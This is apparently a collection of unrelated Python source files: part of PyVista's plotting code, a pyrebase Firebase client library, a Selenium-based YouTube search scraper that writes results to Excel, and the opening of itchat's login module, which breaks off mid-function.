use_ipyvtk : bool, optional
Deprecated. Instead, set the backend either globally with
``pyvista.set_jupyter_backend('ipyvtklink')`` or with
``backend='ipyvtklink'``.
jupyter_backend : str, optional
Jupyter notebook plotting backend to use. One of the
following:
* ``'none'`` : Do not display in the notebook.
* ``'pythreejs'`` : Show a ``pythreejs`` widget
* ``'static'`` : Display a static figure.
* ``'ipygany'`` : Show a ``ipygany`` widget
* ``'panel'`` : Show a ``panel`` widget.
This can also be set globally with
:func:`pyvista.set_jupyter_backend`.
return_viewer : bool, optional
Return the jupyterlab viewer, scene, or display object
when plotting with jupyter notebook.
return_cpos : bool, optional
Return the last camera position from the render window
when enabled. Default based on theme setting. See
:attr:`pyvista.themes.DefaultTheme.return_cpos`.
**kwargs : dict, optional
Developer keyword arguments.
Returns
-------
cpos : list
List of camera position, focal point, and view up.
Returned only when ``return_cpos=True`` or set in the
default global or plot theme. Not returned when in a
jupyter notebook and ``return_viewer=True``.
image : np.ndarray
Numpy array of the last image when either ``return_img=True``
or ``screenshot=True`` is set. Not returned when in a
jupyter notebook with ``return_viewer=True``. Optionally
contains alpha values. Sized:
* [Window height x Window width x 3] if the theme sets
``transparent_background=False``.
* [Window height x Window width x 4] if the theme sets
``transparent_background=True``.
widget
IPython widget when ``return_viewer=True``.
Notes
-----
Please use the ``q``-key to close the plotter as some
operating systems (namely Windows) will experience issues
saving a screenshot if the exit button in the GUI is pressed.
Examples
--------
Simply show the plot of a mesh.
>>> import pyvista as pv
>>> pl = pv.Plotter()
>>> _ = pl.add_mesh(pv.Cube())
>>> pl.show()
Take a screenshot interactively. Screenshot will be of the
first image shown, so use the first call with
``auto_close=False`` to set the scene before taking the
screenshot.
>>> pl = pv.Plotter()
>>> _ = pl.add_mesh(pv.Cube())
>>> pl.show(auto_close=False) # doctest:+SKIP
>>> pl.show(screenshot='my_image.png') # doctest:+SKIP
Display a ``pythreejs`` scene within a jupyter notebook
>>> pl.show(jupyter_backend='pythreejs') # doctest:+SKIP
Return a ``pythreejs`` scene.
>>> pl.show(jupyter_backend='pythreejs', return_viewer=True) # doctest:+SKIP
Obtain the camera position when using ``show``.
>>> pl = pv.Plotter()
>>> _ = pl.add_mesh(pv.Sphere())
>>> pl.show(return_cpos=True) # doctest:+SKIP
[(2.223005211686484, -0.3126909484828709, 2.4686209867735065),
(0.0, 0.0, 0.0),
(-0.6839951597283509, -0.47207319712073137, 0.5561452310578585)]
"""
# developer keyword argument: runs a function immediately prior to ``close``
self._before_close_callback = kwargs.pop('before_close_callback', None)
jupyter_kwargs = kwargs.pop('jupyter_kwargs', {})
assert_empty_kwargs(**kwargs)
if interactive_update and auto_close is None:
auto_close = False
elif interactive_update and auto_close:
warnings.warn(
textwrap.dedent(
"""
The plotter will close immediately automatically since ``auto_close=True``.
Either, do not specify ``auto_close``, or set it to ``False`` if you want to
interact with the plotter interactively.
"""
).strip()
)
elif auto_close is None:
auto_close = self._theme.auto_close
if use_ipyvtk:
txt = textwrap.dedent(
"""
use_ipyvtk is deprecated. Set the backend
globally with ``pyvista.set_jupyter_backend("ipyvtklink")
or with ``backend="ipyvtklink"``
"""
).strip()
from pyvista.core.errors import DeprecationError
raise DeprecationError(txt)
if not hasattr(self, "ren_win"):
raise RuntimeError("This plotter has been closed and cannot be shown.")
if full_screen is None:
full_screen = self._theme.full_screen
if full_screen:
self.ren_win.SetFullScreen(True)
self.ren_win.BordersOn() # super buggy when disabled
else:
if window_size is None:
window_size = self.window_size
else:
self._window_size_unset = False
self.ren_win.SetSize(window_size[0], window_size[1])
# reset unless camera for the first render unless camera is set
self._on_first_render_request(cpos)
# handle plotter notebook
if jupyter_backend and not self.notebook:
warnings.warn(
'Not within a jupyter notebook environment.\nIgnoring ``jupyter_backend``.'
)
if self.notebook:
from ..jupyter.notebook import handle_plotter
if jupyter_backend is None:
jupyter_backend = self._theme.jupyter_backend
if jupyter_backend != 'none':
disp = handle_plotter(
self, backend=jupyter_backend, return_viewer=return_viewer, **jupyter_kwargs
)
return disp
self.render()
# This has to be after the first render for some reason
if title is None:
title = self.title
if title:
self.ren_win.SetWindowName(title)
self.title = title
# Keep track of image for sphinx-gallery
if pyvista.BUILDING_GALLERY or screenshot:
# always save screenshots for sphinx_gallery
self.last_image = self.screenshot(screenshot, return_img=True)
self.last_image_depth = self.get_image_depth()
# See: https://github.com/pyvista/pyvista/issues/186#issuecomment-550993270
if interactive and not self.off_screen:
try: # interrupts will be caught here
log.debug('Starting iren')
self.iren.update_style()
if not interactive_update:
# Resolves #1260
if os.name == 'nt':
if _vtk.VTK9:
self.iren.process_events()
else:
global VERY_FIRST_RENDER
if not VERY_FIRST_RENDER:
self.iren.start()
VERY_FIRST_RENDER = False
self.iren.start()
self.iren.initialize()
except KeyboardInterrupt:
log.debug('KeyboardInterrupt')
self.close()
raise KeyboardInterrupt
# In the event that the user hits the exit-button on the GUI (on
# Windows OS) then it must be finalized and deleted as accessing it
# will kill the kernel.
# Here we check for that and clean it up before moving on to any of
# the closing routines that might try to still access that
# render window.
if not self.ren_win.IsCurrent():
self._clear_ren_win() # The ren_win is deleted
# proper screenshots cannot be saved if this happens
if not auto_close:
warnings.warn(
"`auto_close` ignored: by clicking the exit button, "
"you have destroyed the render window and we have to "
"close it out."
)
auto_close = True
# NOTE: after this point, nothing from the render window can be accessed
# as if a user presed the close button, then it destroys the
# the render view and a stream of errors will kill the Python
# kernel if code here tries to access that renderer.
# See issues #135 and #186 for insight before editing the
# remainder of this function.
# Close the render window if requested
if auto_close:
self.close()
# If user asked for screenshot, return as numpy array after camera
# position
if return_img or screenshot is True:
if return_cpos:
return self.camera_position, self.last_image
if return_cpos:
return self.camera_position
def add_title(self, title, font_size=18, color=None, font=None, shadow=False):
"""Add text to the top center of the plot.
This is merely a convenience method that calls ``add_text``
with ``position='upper_edge'``.
Parameters
----------
title : str
The text to add the rendering.
font_size : float, optional
Sets the size of the title font. Defaults to 16 or the
value of the global theme if set.
color : color_like, optional,
Either a string, rgb list, or hex color string. Defaults
to white or the value of the global theme if set. For
example:
* ``color='white'``
* ``color='w'``
* ``color=[1.0, 1.0, 1.0]``
* ``color='#FFFFFF'``
font : str, optional
Font name may be ``'courier'``, ``'times'``, or ``'arial'``.
shadow : bool, optional
Adds a black shadow to the text. Defaults to ``False``.
Returns
-------
vtk.vtkTextActor
Text actor added to plot.
Examples
--------
>>> import pyvista
>>> pl = pyvista.Plotter()
>>> pl.background_color = 'grey'
>>> actor = pl.add_title('Plot Title', font='courier', color='k',
... font_size=40)
>>> pl.show()
"""
# add additional spacing from the top of the figure by default
title = '\n' + title
return self.add_text(
title,
position='upper_edge',
font_size=font_size,
color=color,
font=font,
shadow=shadow,
name='title',
viewport=False,
)
def add_cursor(
self,
bounds=(-1.0, 1.0, -1.0, 1.0, -1.0, 1.0),
focal_point=(0.0, 0.0, 0.0),
color=None,
):
"""Add a cursor of a PyVista or VTK dataset to the scene.
Parameters
----------
bounds : length 6 sequence
Specify the bounds in the format of:
- ``(xmin, xmax, ymin, ymax, zmin, zmax)``
Defaults to ``(-1.0, 1.0, -1.0, 1.0, -1.0, 1.0)``.
focal_point : list or tuple, optional
The focal point of the cursor.
Defaults to ``(0.0, 0.0, 0.0)``.
color : color_like, optional
Either a string, RGB sequence, or hex color string. For one
of the following.
* ``color='white'``
* ``color='w'``
* ``color=[1.0, 1.0, 1.0]``
* ``color='#FFFFFF'``
Returns
-------
vtk.vtkActor
VTK actor of the 2D cursor.
Examples
--------
>>> import pyvista
>>> sphere = pyvista.Sphere()
>>> plotter = pyvista.Plotter()
>>> _ = plotter.add_mesh(sphere)
>>> _ = plotter.add_cursor()
>>> plotter.show()
"""
alg = _vtk.vtkCursor3D()
alg.SetModelBounds(bounds)
alg.SetFocalPoint(focal_point)
alg.AllOn()
mapper = make_mapper(_vtk.vtkDataSetMapper)
mapper.SetInputConnection(alg.GetOutputPort())
actor, prop = self.add_actor(mapper)
prop.SetColor(Color(color).float_rgb)
return actor
# Tracks created plotters. At the end of the file as we need to
# define ``BasePlotter`` before including it in the type definition.
_ALL_PLOTTERS: Dict[str, BasePlotter] = {}
def _kill_display(disp_id): # pragma: no cover
"""Forcibly close the display on Linux.
See: https://gitlab.kitware.com/vtk/vtk/-/issues/17917#note_783584
And more details into why...
https://stackoverflow.com/questions/64811503
Notes
-----
This is to be used experimentally and is known to cause issues
on `pyvistaqt`
"""
if platform.system() != 'Linux':
raise OSError('This method only works on Linux')
if disp_id:
cdisp_id = int(disp_id[1:].split('_')[0], 16)
# this is unsafe as events might be queued, but sometimes the
# window fails to close if we don't just close it
Thread(target=X11.XCloseDisplay, args=(cdisp_id,)).start()
|
pyrebase.py
|
import requests
from requests import Session
from requests.exceptions import HTTPError
try:
from urllib.parse import urlencode, quote
except BaseException:
from urllib import urlencode, quote
import json
import math
from random import uniform
import time
from collections import OrderedDict
from sseclient import SSEClient
import threading
import socket
from oauth2client.service_account import ServiceAccountCredentials
from requests.packages.urllib3.contrib.appengine import is_appengine_sandbox
from requests_toolbelt.adapters import appengine
import certifi
try:
import python_jwt as jwt
except ImportError:
jwt = None
try:
from Crypto.PublicKey import RSA
except BaseException:
RSA = None
import datetime
from .util import retry
NUM_RETRIES = 3
POOL_SIZE = 100
def initialize_app(config):
if 'projectId' in config.keys():
projectId = config['projectId']
if 'authDomain' in config.keys():
config['authDomain'] = config['authDomain'].format(projectId)
if 'databaseURL' in config.keys():
config['databaseURL'] = config['databaseURL'].format(projectId)
if 'storageBucket' in config.keys():
config['storageBucket'] = config['storageBucket'].format(projectId)
return Firebase(config)
class Firebase:
""" Firebase Interface """
def __init__(self, config):
self.api_key = config.get("apiKey")
self.auth_domain = config.get("authDomain")
self.database_url = config.get("databaseURL")
self.storage_bucket = config.get("storageBucket")
self.credentials = None
self.requests = requests.Session()
if config.get("serviceAccount"):
scopes = [
'https://www.googleapis.com/auth/firebase.database',
'https://www.googleapis.com/auth/userinfo.email',
"https://www.googleapis.com/auth/cloud-platform"
]
service_account_type = type(config["serviceAccount"])
if service_account_type is str:
self.credentials = ServiceAccountCredentials\
.from_json_keyfile_name(
config["serviceAccount"], scopes)
if service_account_type is dict:
self.credentials = ServiceAccountCredentials \
.from_json_keyfile_dict(
config["serviceAccount"], scopes)
if is_appengine_sandbox():
# Fix error in standard GAE environment
# is releated to
# https://github.com/kennethreitz/requests/issues/3187
# ProtocolError('Connection aborted.',
# error(13, 'Permission denied'))
adapter = appengine.AppEngineAdapter(
pool_connections=POOL_SIZE,
pool_maxsize=POOL_SIZE,
max_retries=NUM_RETRIES)
else:
adapter = requests.adapters.HTTPAdapter(
pool_connections=POOL_SIZE,
pool_maxsize=POOL_SIZE,
max_retries=NUM_RETRIES)
for scheme in ('http://', 'https://'):
self.requests.mount(scheme, adapter)
def auth(self):
return Auth(self.api_key, self.requests, self.credentials)
def database(self):
return Database(
self.credentials,
self.api_key,
self.database_url,
self.requests)
def storage(self):
return Storage(self.credentials, self.storage_bucket, self.requests)
class Auth:
""" Authentication Service """
def __init__(self, api_key, requests, credentials):
self.api_key = api_key
self.current_user = None
self.requests = requests
self.credentials = credentials
def sign_in_with_email_and_password(self, email, password):
request_ref = ("https://www.googleapis.com/identitytoolkit" +
"/v3/relyingparty/verifyPassword?key={0}").format(
self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps(
{"email": email, "password": password, "returnSecureToken": True})
request_object = requests.post(
request_ref,
headers=headers,
data=data,
verify=certifi.old_where())
raise_detailed_error(request_object)
self.current_user = request_object.json()
return request_object.json()
def create_custom_token(self, uid, additional_claims=None):
service_account_email = self.credentials.service_account_email
private_key = RSA.importKey(self.credentials._private_key_pkcs8_pem)
payload = {
"iss": service_account_email,
"sub": service_account_email,
"aud": "https://identitytoolkit.googleapis.com/" +
"google.identity.identitytoolkit.v1.IdentityToolkit",
"uid": uid}
if additional_claims:
payload["claims"] = additional_claims
exp = datetime.timedelta(minutes=60)
return jwt.generate_jwt(payload, private_key, "RS256", exp)
def sign_in_with_custom_token(self, token):
request_ref = ("https://www.googleapis.com/identitytoolkit" +
"/v3/relyingparty/verifyCustomToken?key={0}").format(
self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"returnSecureToken": True, "token": token})
request_object = requests.post(
request_ref,
headers=headers,
data=data,
verify=certifi.old_where())
raise_detailed_error(request_object)
return request_object.json()
def refresh(self, refresh_token):
request_ref = "https://securetoken.googleapis.com/v1/token?key={0}" \
.format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"grantType": "refresh_token",
"refreshToken": refresh_token})
request_object = requests.post(
request_ref,
headers=headers,
data=data,
verify=certifi.old_where())
raise_detailed_error(request_object)
request_object_json = request_object.json()
# handle weirdly formatted response
user = {
"userId": request_object_json["user_id"],
"idToken": request_object_json["id_token"],
"refreshToken": request_object_json["refresh_token"]
}
return user
def get_account_info(self, id_token):
request_ref = ("https://www.googleapis.com/identitytoolkit/" +
"v3/relyingparty/getAccountInfo?key={0}") \
.format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"idToken": id_token})
request_object = requests.post(
request_ref,
headers=headers,
data=data,
verify=certifi.old_where())
raise_detailed_error(request_object)
return request_object.json()
def send_email_verification(self, id_token):
request_ref = "https://www.googleapis.com/identitytoolkit/" + \
"v3/relyingparty/getOobConfirmationCode?key={0}" \
.format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"requestType": "VERIFY_EMAIL", "idToken": id_token})
request_object = requests.post(
request_ref,
headers=headers,
data=data,
verify=certifi.old_where())
raise_detailed_error(request_object)
return request_object.json()
def send_password_reset_email(self, email):
request_ref = "https://www.googleapis.com/identitytoolkit/" + \
"v3/relyingparty/getOobConfirmationCode?key={0}" \
.format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"requestType": "PASSWORD_RESET", "email": email})
request_object = requests.post(
request_ref,
headers=headers,
data=data,
verify=certifi.old_where())
raise_detailed_error(request_object)
return request_object.json()
def verify_password_reset_code(self, reset_code, new_password):
request_ref = "https://www.googleapis.com/identitytoolkit" + \
"/v3/relyingparty/resetPassword?key={0}" \
.format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps({"oobCode": reset_code, "newPassword": new_password})
request_object = requests.post(
request_ref,
headers=headers,
data=data,
verify=certifi.old_where())
raise_detailed_error(request_object)
return request_object.json()
def create_user_with_email_and_password(self, email, password):
request_ref = "https://www.googleapis.com/identitytoolkit/" + \
"v3/relyingparty/signupNewUser?key={0}" \
.format(self.api_key)
headers = {"content-type": "application/json; charset=UTF-8"}
data = json.dumps(
{"email": email, "password": password, "returnSecureToken": True})
request_object = requests.post(
request_ref,
headers=headers,
data=data,
verify=certifi.old_where())
raise_detailed_error(request_object)
return request_object.json()
class Database:
""" Database Service """
def __init__(self, credentials, api_key, database_url, requests):
if not database_url.endswith('/'):
url = ''.join([database_url, '/'])
else:
url = database_url
self.credentials = credentials
self.api_key = api_key
self.database_url = url
self.requests = requests
self.path = ""
self.build_query = {}
self.last_push_time = 0
self.last_rand_chars = []
def order_by_key(self):
self.build_query["orderBy"] = "$key"
return self
def order_by_value(self):
self.build_query["orderBy"] = "$value"
return self
def order_by_child(self, order):
self.build_query["orderBy"] = order
return self
def start_at(self, start):
self.build_query["startAt"] = start
return self
def end_at(self, end):
self.build_query["endAt"] = end
return self
def equal_to(self, equal):
self.build_query["equalTo"] = equal
return self
def limit_to_first(self, limit_first):
self.build_query["limitToFirst"] = limit_first
return self
def limit_to_last(self, limit_last):
self.build_query["limitToLast"] = limit_last
return self
def shallow(self):
self.build_query["shallow"] = True
return self
def child(self, *args):
new_path = "/".join([str(arg) for arg in args])
if self.path:
self.path += "/{}".format(new_path)
else:
if new_path.startswith("/"):
new_path = new_path[1:]
self.path = new_path
return self
def build_request_url(self, token, shallow=False):
parameters = {}
if token:
parameters['auth'] = token
if shallow:
parameters['shallow'] = 'true'
for param in list(self.build_query):
if isinstance(self.build_query[param], str):
parameters[param] = quote('"' + self.build_query[param] + '"')
elif isinstance(self.build_query[param], bool):
parameters[param] = "true" if self.build_query[param] \
else "false"
else:
parameters[param] = self.build_query[param]
# reset path and build_query for next query
request_ref = '{0}{1}.json?{2}'.format(
self.database_url, self.path, urlencode(parameters))
self.path = ""
self.build_query = {}
return request_ref
def build_headers(self, token=None):
headers = {"content-type": "application/json; charset=UTF-8"}
if not token and self.credentials:
access_token = self.credentials.get_access_token().access_token
headers['Authorization'] = 'Bearer ' + access_token
return headers
def get(self, token=None, json_kwargs={}, shallow=False):
build_query = self.build_query
query_key = self.path.split("/")[-1]
request_ref = self.build_request_url(token, shallow=shallow)
# headers
headers = self.build_headers(token)
# do request
request_object = self.requests.get(request_ref, headers=headers)
raise_detailed_error(request_object)
request_dict = request_object.json(**json_kwargs)
# if primitive or simple query return
if isinstance(request_dict, list):
return PyreResponse(convert_list_to_pyre(request_dict), query_key)
if not isinstance(request_dict, dict):
return PyreResponse(request_dict, query_key)
if not build_query:
return PyreResponse(
convert_to_pyre(
request_dict.items()),
query_key)
# return keys if shallow
if build_query.get("shallow"):
return PyreResponse(request_dict.keys(), query_key)
# otherwise sort
sorted_response = None
if build_query.get("orderBy"):
if build_query["orderBy"] == "$key":
sorted_response = sorted(
request_dict.items(), key=lambda item: item[0])
elif build_query["orderBy"] == "$value":
sorted_response = sorted(
request_dict.items(), key=lambda item: item[1])
else:
sorted_response = sorted(
request_dict.items(),
key=lambda item: item[1][build_query["orderBy"]])
return PyreResponse(convert_to_pyre(sorted_response), query_key)
def push(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.post(
request_ref, headers=headers, data=json.dumps(
data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
return request_object.json()
def set(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.put(
request_ref, headers=headers, data=json.dumps(
data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
return request_object.json()
def update(self, data, token=None, json_kwargs={}):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.patch(
request_ref, headers=headers, data=json.dumps(
data, **json_kwargs).encode("utf-8"))
raise_detailed_error(request_object)
return request_object.json()
def remove(self, token=None):
request_ref = self.check_token(self.database_url, self.path, token)
self.path = ""
headers = self.build_headers(token)
request_object = self.requests.delete(request_ref, headers=headers)
raise_detailed_error(request_object)
return request_object.json()
def stream(self, stream_handler, token=None, stream_id=None):
request_ref = self.build_request_url(token)
return Stream(
request_ref,
stream_handler,
self.build_headers,
stream_id)
def check_token(self, database_url, path, token):
if token:
return '{0}{1}.json?auth={2}'.format(database_url, path, token)
else:
return '{0}{1}.json'.format(database_url, path)
def generate_key(self):
push_chars = '-0123456789' + \
'ABCDEFGHIJKLMNOPQRSTUVWXYZ_' + \
'abcdefghijklmnopqrstuvwxyz'
now = int(time.time() * 1000)
duplicate_time = now == self.last_push_time
self.last_push_time = now
time_stamp_chars = [0] * 8
for i in reversed(range(0, 8)):
time_stamp_chars[i] = push_chars[now % 64]
now = int(math.floor(now / 64))
new_id = "".join(time_stamp_chars)
if not duplicate_time:
for i in range(0, 12):
self.last_rand_chars.append(
int(math.floor(uniform(0, 1) * 64)))
else:
for i in range(0, 11):
if self.last_rand_chars[i] == 63:
self.last_rand_chars[i] = 0
self.last_rand_chars[i] += 1
for i in range(0, 12):
new_id += push_chars[self.last_rand_chars[i]]
return new_id
def sort(self, origin, by_key):
# unpack pyre objects
pyres = origin.each()
new_list = []
for pyre in pyres:
new_list.append(pyre.item)
# sort
data = sorted(dict(new_list).items(), key=lambda item: item[1][by_key])
return PyreResponse(convert_to_pyre(data), origin.key())
class Storage:
""" Storage Service """
def __init__(self, credentials, storage_bucket, requests):
from google.cloud import storage
self.storage_bucket = \
"https://firebasestorage.googleapis.com/v0/b/" + storage_bucket
self.credentials = credentials
self.requests = requests
self.path = ""
if credentials:
client = storage.Client(
credentials=credentials,
project=storage_bucket)
self.bucket = client.get_bucket(storage_bucket)
def child(self, *args):
new_path = "/".join(args)
if self.path:
self.path += "/{}".format(new_path)
else:
if new_path.startswith("/"):
new_path = new_path[1:]
self.path = new_path
return self
def put(self, file, token=None, userid='guest'):
# reset path
path = self.path
self.path = None
if isinstance(file, str):
with open(file, 'rb') as file_object:
return self._put_file(path, file_object, token, userid)
else:
return self._put_file(path, file, path, token, userid)
def _put_file(self, path, file_object, token, userid):
request_ref = self.storage_bucket + "/o?name={0}".format(path)
def post_file(**kwargs):
def _post_file():
request_object = self.requests.post(
request_ref, data=file_object, **kwargs)
raise_detailed_error(request_object)
return request_object
return retry(
_post_file,
no_retries=10,
sleep_time=5,
exception_class=HTTPServerError)
if token:
headers = {"Authorization": "Firebase " + token}
request_object = post_file(headers=headers)
if userid:
headers['Content-Type'] = 'application/json'
def patch_owner():
patch_request = self.requests.patch(
request_ref,
headers=headers,
data=json.dumps({'metadata': {'owner': userid}})
)
raise_detailed_error(patch_request)
return patch_request
retry(
patch_owner,
no_retries=10,
sleep_time=5,
exception_class=HTTPServerError)
return request_object.json()
elif self.credentials:
blob = self.bucket.blob(path)
if isinstance(file_object, str):
return blob.upload_from_filename(filename=file_object)
else:
return blob.upload_from_file(file_obj=file_object)
else:
return post_file().json()
def delete(self, name):
self.bucket.delete_blob(name)
def download(self, filename, token=None):
# remove leading backlash
path = self.path
url = self.get_url(token)
self.path = None
if path.startswith('/'):
path = path[1:]
if self.credentials:
blob = self.bucket.get_blob(path)
blob.download_to_filename(filename)
else:
def _download_internal():
r = requests.get(url, stream=True)
raise_detailed_error(r)
if r.status_code == 200:
with open(filename, 'wb') as f:
for chunk in r:
f.write(chunk)
elif r.status_code >= 500:
raise HTTPServerError(r.status_code, r.text)
retry(
_download_internal,
no_retries=10,
sleep_time=5,
exception_class=HTTPServerError)
def get_url(self, token):
path = self.path
self.path = None
if path.startswith('/'):
path = path[1:]
if token:
return "{0}/o/{1}?alt=media&token={2}".format(
self.storage_bucket, quote(path, safe=''), token)
return "{0}/o/{1}?alt=media".format(self.storage_bucket,
quote(path, safe=''))
def list_files(self):
return self.bucket.list_blobs()
class HTTPServerError(Exception):
def __init__(self, statuscode, message):
self.msg = message
self.statuscode = statuscode
def raise_detailed_error(request_object):
try:
status = request_object.status_code
if status >= 500:
raise HTTPServerError(status, request_object.text)
request_object.raise_for_status()
except HTTPError as e:
# raise detailed error message
# TODO: Check if we get a { "error" : "Permission denied." } and handle
# automatically
raise HTTPError(e, request_object.text)
def convert_to_pyre(items):
pyre_list = []
for item in items:
pyre_list.append(Pyre(item))
return pyre_list
def convert_list_to_pyre(items):
pyre_list = []
for item in items:
pyre_list.append(Pyre([items.index(item), item]))
return pyre_list
class PyreResponse:
def __init__(self, pyres, query_key):
self.pyres = pyres
self.query_key = query_key
def val(self):
if isinstance(self.pyres, list):
# unpack pyres into OrderedDict
pyre_list = []
# if firebase response was a list
if isinstance(self.pyres[0].key(), int):
for pyre in self.pyres:
pyre_list.append(pyre.val())
return pyre_list
# if firebase response was a dict with keys
for pyre in self.pyres:
pyre_list.append((pyre.key(), pyre.val()))
return OrderedDict(pyre_list)
else:
# return primitive or simple query results
return self.pyres
def key(self):
return self.query_key
def each(self):
if isinstance(self.pyres, list):
return self.pyres
class Pyre:
def __init__(self, item):
self.item = item
def val(self):
return self.item[1]
def key(self):
return self.item[0]
class KeepAuthSession(Session):
"""
A session that doesn't drop Authentication on redirects between domains.
"""
def rebuild_auth(self, prepared_request, response):
pass
class ClosableSSEClient(SSEClient):
def __init__(self, *args, **kwargs):
self.should_connect = True
super(ClosableSSEClient, self).__init__(*args, **kwargs)
def _connect(self):
if self.should_connect:
super(ClosableSSEClient, self)._connect()
else:
raise StopIteration()
def close(self):
self.should_connect = False
self.retry = 0
self.resp.raw._fp.fp.raw._sock.shutdown(socket.SHUT_RDWR)
self.resp.raw._fp.fp.raw._sock.close()
class Stream:
def __init__(self, url, stream_handler, build_headers, stream_id):
self.build_headers = build_headers
self.url = url
self.stream_handler = stream_handler
self.stream_id = stream_id
self.sse = None
self.thread = None
self.start()
def make_session(self):
"""
Return a custom session object to be passed to the ClosableSSEClient.
"""
session = KeepAuthSession()
return session
def start(self):
self.thread = threading.Thread(target=self.start_stream)
self.thread.start()
return self
def start_stream(self):
self.sse = ClosableSSEClient(
self.url,
session=self.make_session(),
build_headers=self.build_headers)
for msg in self.sse:
if msg:
msg_data = json.loads(msg.data)
msg_data["event"] = msg.event
if self.stream_id:
msg_data["stream_id"] = self.stream_id
self.stream_handler(msg_data)
def close(self):
while not self.sse and not hasattr(self.sse, 'resp'):
time.sleep(0.001)
self.sse.running = False
self.sse.close()
self.thread.join()
return self
|
search.py
|
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from time import sleep, time
import pandas as pd
from threading import Thread
import requests
import re
from random import random
# choose a driver
wd = webdriver.Chrome()
# specify the the wait time for a new page to be fully loaded
wait_time_for_loading = 5
links_titles = []
ytv_info = []
yt_channel_v_links =[]
def crawl_page(url):
wd.get(url)
def converter_to_url(query_):
fma = 'https://www.youtube.com/results?search_query={}'
return fma.format('+'.join(q for q in query_.split(' ')))
def get_tar_txt(regex, src_txt):
text = re.findall(rf'{regex}', src_txt)
if len(text) != 0:
text = text[0]
# text = text[0] if len(text) == 1 or text[0] != text[-1] else text[1]
else:
text = ""
return text
def get_digits(strg):
if len(strg) != 0:
if strg.endswith(('K', 'k')):
num = float(strg[:-1]) * 1000
elif strg.endswith(('M', 'm')):
num = float(strg[:-1]) * 1000000
else:
num = float(''.join(s for s in strg if s.isdigit()))
return num
else:
return ''
def multi_tasking(func, a_list, length, speed):
threads = []
for i in range(0, length, speed):
t = Thread(target=func, args=(a_list[i:i+speed if length - speed else length],))
t.start()
threads.append(t)
for t in threads:
t.join()
def scroll_down(scrolling_limit=30):
sleep(wait_time_for_loading)
videos = wd.find_elements_by_xpath('//*[@id="video-title"]')
# set a counter to avoid long time crawling
counter = 0
while True:
wd.find_element_by_tag_name('body').send_keys(Keys.END) # Scroll down to the bottom
print("Scrolling..." if random() > 0.5 else "..........")
sleep(wait_time_for_loading)
videos_new = wd.find_elements_by_xpath('//*[@id="video-title"]')
counter += 1
if len(videos) != len(videos_new) and counter != scrolling_limit:
videos = videos_new
else:
break
def get_links_titles(videos_):
for video in videos_:
try:
link = video.get_attribute('href')
if link is not None:
title = video.text
links_titles.append([link, title])
except:
continue
print("Processing..." if random() > 0.5 else "..........")
return links_titles
def get_videos_info(links_titles_):
for link_title in links_titles_:
link = link_title[0]
title = link_title[1]
r = requests.get(link)
when = get_tar_txt('[A-Z][a-z]{2} \d{1,}, [\d]{4}', r.text)
views = get_digits(get_tar_txt('(?<="viewCount":{"simpleText":")[\d,]+(?= views)', r.text))
likes = get_digits(get_tar_txt('[\d,]+(?= likes)', r.text))
dislikes = get_digits(get_tar_txt('[\d,]+(?= dislikes)', r.text))
difference = likes - dislikes if dislikes != '' else likes
ratio = "" if dislikes == '' else likes/dislikes
youtuber = get_tar_txt('(?<=ChannelName\":\")[^"]+', r.text)
num_sub = get_digits(get_tar_txt('[\d.]+[KkMM]?(?= subscribers)', r.text))
home_videos_page = 'https://www.youtube.com' + \
get_tar_txt('(?<=url":")/channel/[^"]+', r.text) + '/videos'
ytv_info.append([title, when, views, likes, dislikes, difference, ratio,
youtuber, home_videos_page, num_sub, link])
yt_channel_v_links.append(home_videos_page)
print("Processing..." if random() > 0.5 else "..........")
def run(query):
global links_titles, ytv_info, yt_channel_v_links
start = time()
url = converter_to_url(query)
links_titles = []
yt_channel_v_links = []
ytv_info = [['Title', 'Posted on', 'Views', 'Likes', 'Dislikes', 'Difference(L-D)', 'Ratio(L/D)',
'Posted by', 'HOME_VIDEOS_PAGE_LINK', 'Subscribers','Video Link']]
crawl_page(url)
scroll_down(2)
videos = wd.find_elements_by_xpath('//*[@id="video-title"]')
multi_tasking(get_links_titles, videos, len(videos), 100)
print("Collecting videos info...")
multi_tasking(get_videos_info, links_titles, len(links_titles), 20)
print('Creating file....')
pd.DataFrame(ytv_info).to_excel(f'{query}.xlsx')
print(f'File {query}.xlsx created!')
end = time()
print("Total time taken: " + str((end-start)))
return links_titles, set(yt_channel_v_links)
def quit_out():
wd.quit()
def main():
queries = ['A list of queries...']
for query in queries:
try:
run(query)
except:
continue
quit_out()
if __name__ == '__main__':
main()
|
login.py
|
import os, sys, time, re, io
import threading
import json, xml.dom.minidom
import copy, pickle, random
import traceback, logging
try:
from httplib import BadStatusLine
except ImportError:
from http.client import BadStatusLine
import requests
import datetime
from pyqrcode import QRCode
from .. import config, utils
from ..returnvalues import ReturnValue
from ..storage.templates import wrap_user_dict
from .contact import update_local_chatrooms, update_local_friends
# from .messages import produce_msg
logger = logging.getLogger('itchat')
def load_login(core):
core.login = login
core.get_QRuuid = get_QRuuid
core.get_QR = get_QR
core.check_login = check_login
core.web_init = web_init
core.show_mobile_login = show_mobile_login
core.sync_check = sync_check
core.start_receiving = start_receiving
core.get_msg = get_msg
core.logout = logout
def login(self, enableCmdQR=False, picDir=None, qrCallback=None,
loginCallback=None, exitCallback=None):
if self.alive or self.isLogging:
logger.warning('itchat has already logged in.')
return
self.isLogging = True
while self.isLogging:
uuid = push_login(self)
if uuid:
qrStorage = io.BytesIO()
else:
logger.info('Getting uuid of QR code.')
while not self.get_QRuuid():
time.sleep(1)
logger.info('Downloading QR code.')
qrStorage = self.get_QR(enableCmdQR=enableCmdQR,
